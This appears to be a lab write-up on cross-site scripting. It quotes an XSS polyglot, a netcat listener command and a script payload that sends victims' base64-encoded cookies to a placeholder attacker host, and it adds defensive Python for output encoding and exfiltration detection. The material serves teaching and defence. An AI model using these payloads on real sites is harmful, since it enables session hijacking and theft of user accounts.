Intro to Cross-site Scripting

We get an explanation of XSS and some examples of different types of XSS attacks, e.g. a Proof of Concept, Session Stealing, Key Logger, Business Logic.

We then learn a bit about Reflected XSS and how to test for it, e.g.

  • Parameters in the URL Query String

  • URL File Path

  • Sometimes HTTP Headers (although unlikely exploitable in practice)

Next we learn about Stored XSS attacks and that these can be things like comments on a blog, user profile information or website listings. Next is DOM Based XSS, which requires a lot more knowledge and skill, as well as Blind XSS attacks, which are similar to stored XSS attacks but you can't see the payload working or test it against yourself first.

We then go on to the next section, called 'Perfecting Your Payload', where we go through some different XSS attacks and how we can escape out of different contexts, e.g. inputs, text areas, JS code etc.

Most importantly, we learn about the XSS Polyglot, which allows us to test for all of these with a single line of code.

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e

In the final section we need to execute a blind XSS attack on a customer ticket portal.

We start by making an account and creating a ticket. Once we view the ticket, we notice that it uses a text area to edit the contents. We create a new ticket and escape the text area like so: </textarea>test. We can try this with an alert() to see if it works, and as expected it does.
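As an added example (not code from this write-up or from the room), the Python below shows the defensive side of the textarea escape above and of the polyglot from the previous section: a ticket view that drops the body into a <textarea> verbatim, next to one that HTML-encodes it first, plus a check for whether any user-supplied tag survives rendering. The two rendering functions and the check are hypothetical; the polyglot string is the one quoted on this page.

```python
import html
import re

# The polyglot test string quoted on this page (raw string so the backslashes stay literal)
POLYGLOT = r'''jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e'''

# The textarea escape used on the ticket portal, as described above
TEXTAREA_ESCAPE = "</textarea>test"

# Matches the start of any HTML tag, opening or closing, regardless of letter case
TAG_START_RE = re.compile(r"</?[A-Za-z]")


def render_ticket_unsafe(body: str) -> str:
    """Vulnerable (hypothetical) ticket view: the body is inserted verbatim.

    A body beginning with '</textarea>' closes the element early and whatever
    follows is parsed by the browser as ordinary HTML.
    """
    return f"<textarea>{body}</textarea>"


def render_ticket_safe(body: str) -> str:
    """Hardened (hypothetical) ticket view: the body is HTML-encoded first.

    html.escape turns '<', '>', '&' and quotes into entities, so user data can
    never close the textarea and no user-supplied tag is ever parsed.
    """
    return f"<textarea>{html.escape(body, quote=True)}</textarea>"


def user_markup_survives(rendered: str) -> bool:
    """Return True if the user-controlled part of the fragment still contains a tag start.

    Only the fixed <textarea>...</textarea> wrapper written by the template is
    trusted; everything between those markers came from the user.
    """
    prefix, suffix = "<textarea>", "</textarea>"
    inner = rendered[len(prefix):]
    if inner.endswith(suffix):
        inner = inner[:-len(suffix)]
    return TAG_START_RE.search(inner) is not None


if __name__ == "__main__":
    for label, body in (("textarea escape", TEXTAREA_ESCAPE), ("polyglot", POLYGLOT)):
        print(f"{label:16} unsafe -> breaks out: {user_markup_survives(render_ticket_unsafe(body))}")
        print(f"{label:16} safe   -> breaks out: {user_markup_survives(render_ticket_safe(body))}")
```

The check is deliberately crude (any `<` followed by a letter in user-controlled output counts as a failure); it is a unit-test style guard for a template, not a replacement for a proper HTML-aware encoder in every context the room lists (attributes, script blocks, style blocks each need their own encoding rules).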

Next we learn about Netcat and how to set it up to listen on a specific port, which we do with the following command, where -n allows us to discover errors, -l puts netcat in listening mode, -v is verbose mode and -p allows us to specify the port, which is 9001 for us.

nc -n -l -v -p 9001

We then get provided with a payload to use, which looks like this:

</textarea><script>fetch('http://URL_OR_IP:PORT_NUMBER?cookie=' + btoa(document.cookie) );</script

As well as a breakdown of what it does and how it works:

Breakdown of the payload

We can then create another ticket and use the payload in the ticket body, after we have updated the payload to use our AttackBox IP and the port number.

Once we open the ticket, this is the output we get from Netcat:

Netcat output

We can then take the cookie value and base64 decode it to get the value of the staff-session cookie which is our flag for this task.
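As an added example (not code from this write-up or from the room), here is a small Python triage routine for the detection side of this final task: given egress or proxy log lines, it flags requests whose query-string parameters carry base64 that decodes to cookie-style name=value pairs, which is exactly the shape of the fetch payload above, and reports the cookie names that were taken. The log layout, the attacker.example host and the sample cookie value are constructed for the example.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: what the room's payload would send, base64-encoded as btoa() does.
# The cookie name matches the task; the value and the hostnames are made up.
SAMPLE_COOKIE = "staff-session=abc123"
ENCODED = base64.b64encode(SAMPLE_COOKIE.encode()).decode()

# Constructed egress-log lines in a simplified "timestamp client method url" layout
SAMPLE_LOG = f"""\
2024-01-01T10:00:00Z 10.0.0.5 GET http://intranet.example/tickets/42
2024-01-01T10:00:01Z 10.0.0.5 GET http://attacker.example:9001/?cookie={ENCODED}
2024-01-01T10:00:02Z 10.0.0.7 GET http://intranet.example/search?q=hello
2024-01-01T10:00:03Z 10.0.0.7 GET http://intranet.example/api?page=2&sort=asc
"""

# One or more "name=value" pairs separated by "; ", i.e. the format of document.cookie
COOKIE_PAIRS_RE = re.compile(r"^[\w.-]+=[^;]*(?:;\s*[\w.-]+=[^;]*)*$")


def decode_if_base64(value: str):
    """Return the decoded text if value is well-formed base64 of printable ASCII, else None."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text and text.isprintable() else None


def find_cookie_exfil(log_text: str) -> list:
    """Scan log lines and report query parameters that look like an encoded cookie jar."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue  # not a request line in the layout we understand
        ts, client, _method, url = fields[:4]
        parts = urlsplit(url)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            # parse_qsl turns a literal '+' into a space; btoa() output can contain '+',
            # so restore it before attempting to decode
            decoded = decode_if_base64(value.replace(" ", "+"))
            if decoded is None or not COOKIE_PAIRS_RE.match(decoded):
                continue
            cookie_names = [pair.split("=", 1)[0].strip() for pair in decoded.split(";")]
            findings.append({
                "time": ts,
                "client": client,
                "destination": parts.netloc,
                "param": name,
                "cookie_names": cookie_names,  # names only, so the stolen values are not logged again
            })
    return findings


if __name__ == "__main__":
    for hit in find_cookie_exfil(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} -> {hit['destination']} "
              f"param={hit['param']} cookies={hit['cookie_names']}")
```

The matching mitigation on the application side is to set the session cookie with the HttpOnly flag: a cookie marked HttpOnly is not exposed through document.cookie, so this particular payload would send nothing useful for it, and the detection above would then only ever see the cookies that were left readable by script.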
